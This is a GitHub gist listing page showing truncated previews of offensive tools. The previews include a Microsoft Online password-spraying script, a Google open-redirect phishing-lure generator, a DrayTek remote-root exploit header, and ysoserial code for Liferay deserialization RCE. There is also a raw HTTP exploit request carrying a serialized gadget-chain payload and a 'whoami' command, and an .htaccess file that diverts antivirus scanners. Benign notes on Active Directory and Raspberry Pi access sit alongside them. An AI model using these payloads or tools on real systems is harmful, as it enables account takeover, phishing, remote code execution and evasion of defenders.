Skip to content

Instantly share code, notes, and snippets.

View filipesam's full-sized avatar

filipesam

17 followers · 64 following
View GitHub Profile
@byt3bl33d3r
byt3bl33d3r / msol_spray.py
Last active March 6, 2024 05:03
Fully async python port of @dafthacks MSOLSpray (https://github.com/dafthack/MSOLSpray)
#! /usr/bin/env python3
#
# Requires Python 3.7+ & aiohttp (speedups recommended)
# pip3 install aiohttp[speedups]
#
import sys
import asyncio
import aiohttp
@ustayready
ustayready / google_lure.py
Last active March 4, 2024 15:44
Generate phishing lures that exploit open-redirects from www.google.com using Google Docs
from __future__ import print_function
import pickle
import os.path
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
from apiclient import errors
import re
from bs4 import BeautifulSoup as Soup
@0xsha
0xsha / CVE-2020-8515.go
Last active March 30, 2024 20:52
CVE-2020-8515: DrayTek pre-auth remote root RCE
package main
/*
CVE-2020-8515: DrayTek pre-auth remote root RCE
Mon Mar 30 2020 - 0xsha.io
Affected:
@filipesam
filipesam / LiferayJsonEvalCC6.java
Created March 28, 2020 12:11 — forked from testanull/LiferayJsonEvalCC6.java
Liferay Json Deserialize 1 hit RCE
package ysoserial.payloads;
import com.mchange.lang.ByteUtils;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import ysoserial.payloads.annotation.Authors;
@testanull
testanull / LiferayRce.txt
Last active December 18, 2023 03:58
POST /api/jsonws/invoke HTTP/1.1
Host: <Host>
Connection: close
cmd2: whoami
Content-Type: application/x-www-form-urlencoded
Content-Length: 4912
cmd={"/expandocolumn/update-column":{}}&p_auth=<valid token>&formDate=<date>&columnId=123&name=asdasd&type=1&defaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource={"userOverridesAsString":"HexAsciiSerializedMap:ACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73
@testanull
testanull / LiferayJsonEvalCC6.java
Created March 27, 2020 09:18
Liferay Json Deserialize 1 hit RCE
package ysoserial.payloads;
import com.mchange.lang.ByteUtils;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.map.LazyMap;
import ysoserial.payloads.annotation.Authors;
@tscherf
tscherf / ldapsearch_test_results.md
Last active December 29, 2022 14:14
MS ADV190023

Signing

simple bind over insecure channel

# ldapsearch -xLLL -H ldap://ad1.win2016.test -b 'DC=win2016,DC=test' -D 'CN=Administrator,CN=Users,DC=win2016,DC=test' -W samaccountname=Administrator DN 
Enter LDAP Password: 
ldap_bind: Strong(er) authentication required (8)
        additional info: 00002028: LdapErr: DSID-0C090256, comment: The server requires binds to turn on integrity checking if SSL\TLS are not already active on the connection, data 0, v3839
@jc-torresp
jc-torresp / access-pi-anywhere.md
Created September 21, 2019 05:12
Configuration to access Raspberry Pi from anywhere with UPnP port forwarding

Access Raspberry Pi from anywhere

Dynamic DNS

We need to use so called Dynamic DNS (DDNS) to create and dynamically update a mapping between a chosen domain name and an “external” IP address of our Raspberry Pi (i.e. router IP address).

  • Look for a DDNS provider.
  • Register a new user account.
  • Choose a desire domain name.
  • Configure it on router.
@ivanitlearning
ivanitlearning / AD notes.md
Last active June 7, 2023 19:06
Some notes I took while learning about Active Directory

Notes on learning Active Directory

  1. NetBIOS name should match your forest FQDN. So if FQDN=adlunches.net, NetBIOS name is ADLUNCHES
  2. Every AD forest has a server which indexes all the objects in the forest. This is known as the Global Catalog server.
    1. Each domain needs at least 1 GC server, can have more for redundancy. This is so it can find objects in other domains.
    2. Any DC can be GC.
    3. By default all DCs will be GCs. GCs take up disk space and bandwidth, but both are plentiful.
    4. Microsoft Exchange requires GC server to run.
    5. Allow logins via UPN eg. user@highcosttraining.com, which may be on same domain.
  3. GC servers should be deployed at sites with poor WAN links or filtered connections.
@Meatballs1
Meatballs1 / .htaccess
Last active January 12, 2023 00:32 — forked from curi0usJack/.htaccess
Drop into your apache working directory to instantly redirect most AV crap elsewhere.
Define REDIR_TARGET example.com
RewriteEngine On
RewriteOptions Inherit
# Uncomment the below line for verbose logging, including seeing which rule matched.
#LogLevel alert rewrite:trace5
# BURN AV BURN